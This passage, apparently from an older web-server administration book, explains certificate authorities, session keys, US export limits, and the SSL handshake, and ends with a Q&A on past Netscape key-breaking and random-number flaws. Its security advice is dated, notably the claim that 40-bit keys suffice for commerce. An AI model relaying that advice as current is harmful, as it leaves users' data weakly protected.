This is where digital certificates come in. A digital certificate is effectively an organization's public key encrypted by the private key of a central organization called a certificate authority. The certificate authority, or CA, is a central, trustworthy organization that is authorized to sign digital certificates. If you get your certificate signed by a CA, anyone can verify that your public key does indeed belong to you by verifying that the CA's digital signature is valid.
How do you verify that a CA's signature is valid? You have a set of certificate authorities that you already know are valid (usually their public keys are available to you in some way that makes them trustworthy). So, if someone gives you a certificate signed by a CA you trust, you can decrypt their public key using the public key of the CA that you already have.
Certificate authorities are hierarchical; a central CA can authorize another CA to issue certificates, and those CAs can do the same to CAs below them. So any individual certificate you get may have a chain of signatures, and eventually you can follow them all back up the chain to the topmost CA that you know. Or, at least, that's the theory. In reality, a company called Verisign is the most popular and active CA, and it is where most certificates used for SSL are generated.
While public key encryption is very secure, it's also very slow if the actual public key is used to encrypt the information to be transmitted. For this reason, most systems that use public key encryption use the public keys for the initial greeting and then use a session key to encrypt the data so that things move faster.
The session key is essentially a really big number: usually either 40-bit (2^40 possible combinations) or 128-bit (2^128 possible combinations), depending on whether your software is the international or the United States-only version.
Why have two different key sizes? The answer lies in politics, not in cryptography. United States export laws prevent companies from distributing encryption software with keys larger than 40 bits outside the United States. So companies such as Netscape create two versions of their software: one with 40-bit keys for international use, and one with 128-bit keys for United States-only use. Which software you have (the 128- or the 40-bit version) depends on where you got it. Anything you download off the Net will be the 40-bit version. If you want the really secure version, you'll have to buy the shrink-wrapped copies inside the United States.
Why the restrictions on key sizes and exporting software with encryption in it? The United States puts these restrictions on cryptography so that it can break codes generated by foreign terrorists or other undesirable organizations. Cryptographically speaking, 128-bit keys are about as secure as you can get. Assuming you could test 1 million keys per second using a supercomputer, it would take you 10^25 years to break a code encrypted with a 128-bit key (the universe is only about 10^10 years old, for comparison). 40-bit keys, on the other hand, would take only about 13 days.
An unfortunate side effect of this restriction is that 40-bit session keys are also reasonably easy to break by organizations that are not governments. Cryptography experts agree, therefore, that 40-bit software is "crippled" and useless for real security purposes. In reality, the 40-bit keys are probably secure enough for most simple Internet transactions such as credit card numbers.
Got all that? Now that you understand public key encryption, digital signatures, and session keys, we can finally reveal how SSL connections are made (for those of you who have not yet fallen asleep).
For a secure SSL connection, you'll need both a browser and a server that support SSL. SSL connections use special URLs (they start with https rather than just http), and the browser connects to the server using a different port from the standard HTTPD. Here's what happens when a browser requests a secure connection from a server:
1. The browser connects to the server's secure port and asks for a secure session.
2. The server responds with its digital certificate, which contains its public key.
3. The browser checks the signature on the certificate against the certificate authorities it already trusts; if the certificate doesn't check out, the browser warns the user.
4. The browser generates a master key, based in part on a random number, encrypts that key with the server's public key, and sends it to the server.
5. The server decrypts the master key with its private key. Browser and server then each use the master key to generate the session keys.
6. From that point on, everything sent in either direction is encrypted with the session keys.
To use secure transactions on your server, you'll need a Web server that supports SSL. Many commercial servers in the United States provide SSL support, including Netscape's servers (all except the Communications Server), O'Reilly's WebSite, and StarNine's WebStar (the latter two may have SSL as a professional option to the standard server package). Additionally, the public domain server Apache has a version called ApacheSSL, which has support for SSL as well (although you'll have to get a cryptography package called RSARef in order to run it, and RSARef is neither public domain nor free for most uses).
Note |
All this applies only to servers sold inside the United States. Because of United States export controls on cryptography, commercial organizations cannot sell products with encryption outside the United States unless that encryption has been crippled. |
Each SSL server should provide a mechanism for generating the appropriate keys (a "certificate request") and for getting those keys signed by a certificate authority (usually Verisign; see http://www.verisign.com/ for details on digital signatures). Once you have a certificate signed and installed, that's all there is to it; now browsers will be able to connect to you and establish secure connections.
Some servers also provide a mechanism for allowing you to self-sign your certificates, that is, to provide SSL connections without a digital signature from a central CA. This makes your connection much less trustworthy, and at the moment Netscape 2.0 is the only browser that will accept self-signed certificates (and even then only after prompting the reader with a series of warning dialog boxes). For truly secure connections and for Internet commerce, you'll definitely want to go the legitimate way and get your certificate signed by a verifiable CA.
Netscape, as the original developer of SSL, is a good place to start for information about SSL and network security. Their pages at http://www.netscape.com/info/security-doc.html have lots of information about SSL and Web security in general, as well as technical specifications for SSL itself.
Verisign is the United States' leading certificate authority, and the closest thing there is to a "top" of the CA hierarchy. To get a digital certificate, you'll usually have to go to Verisign. See http://www.verisign.com for more information.
For more information about Web security in general, you might want to check out the security page at the World Wide Web Consortium at http://www.w3.org/hypertext/WWW/Security/Overview.html.
Security on the Internet is a growing concern, and as the administrator of a Web server, you should be concerned about it as well. Although the sorts of problems that can be caused by a Web server are minor compared to other Internet services, there are precautions you can take to prevent external and internal users from doing damage to your system or compromising the security you have already set up.
In this chapter, you learned about some of those precautions, including the following:
- Running your server as an unprivileged user such as Nobody
- Limiting CGI scripts to a central, vetted directory and writing them defensively
- Controlling symbolic links, server includes, and directory indexing with the Options command
- Keeping well-behaved spiders away from all or part of your server with a robots.txt file
- Restricting access to directories by host name or IP address, or to specific users and groups with authentication
- Using SSL to encrypt connections that carry sensitive data
Q | I put a .htaccess file in my home directory, but nothing I put in it seems to have any effect. What's going on here? |
A | Your server administrator has probably set up a default configuration and then turned overrides off. Check with him or her to see what you can do in your own .htaccess file, if anything. |
Q | I am limiting access to my directory using <LIMIT> and a deny command. But now whenever I try to access my files, I get a 500 Server Error message. What did I do wrong? |
A | Make sure that the first part of your <LIMIT> section is <LIMIT GET>. If you forget the GET, you'll get a server error.
Note that most problems in access control and setup file errors will show up in the error log for your server. You can usually troubleshoot most problems with the NCSA server that way. |
Q | I have this great idea in which I authenticate everyone reading my site, keep track of where they go, and then suggest other places for them to look based on their browsing patterns. Intelligent agents on the Web! Isn't this great? |
A | Yup, you could use your authentication information as a method of watching for the browsing patterns of the readers of your site. However, be forewarned that there is a fine line there. Your readers might not want you to watch their reading patterns. They might not be interested in your suggestions. When in doubt, don't use information from your users unless they want you to. Some Web readers are very concerned about their privacy and how closely they are watched as they browse the Web. When in doubt, ask. Those who are interested in having an agent-like program suggest other sites for them will gleefully sign on, and those who don't want to be watched will ignore you. It'll give you less work to do. (You'll only have to keep track of the users who want the information.) And it will make you a better Web citizen. |
Q | A while back there was a big news item about how some guy in France broke into Netscape's security in eight days. What happened there? |
A | If you read the section on SSL, you'll remember that I said that given a million tests a second, 40-bit session keys can be theoretically broken in about 13 days. That was the version of Netscape that was broken-the version that is known to be crippled to deal with the United States export restrictions. The guy in France had access to several hundred computers, and he set them all to doing nothing but trying to break a single session key (it took him eight days). However, not every random hacker looking for credit card numbers is going to have access to several hundred computers for eight days, so for the most part, the 40-bit version is acceptable for basic Internet commerce. If you're worried about even that level of security, consider purchasing the software with the 128-bit keys (not even guys in France could easily break that version). |
Q | There was another scandal about Netscape's security that had something to do with random numbers. What was that all about? |
A | That was indeed a genuine flaw. If you read the section in this chapter about how the browser generates a master key, you'll note that it uses a random number as one of the things used to generate that key. The
master key is then used to generate the session keys-both the 40- and 128-bit versions.
The problem with Netscape's security was that the random number generator it used was not truly random, and, in fact, it was pretty easy to guess which random number was used to generate the master key. Once you know the master key, you can generate session keys that match the ones the browser and server are using to encrypt their data. Netscape, fortunately, fixed this problem in their software almost immediately. |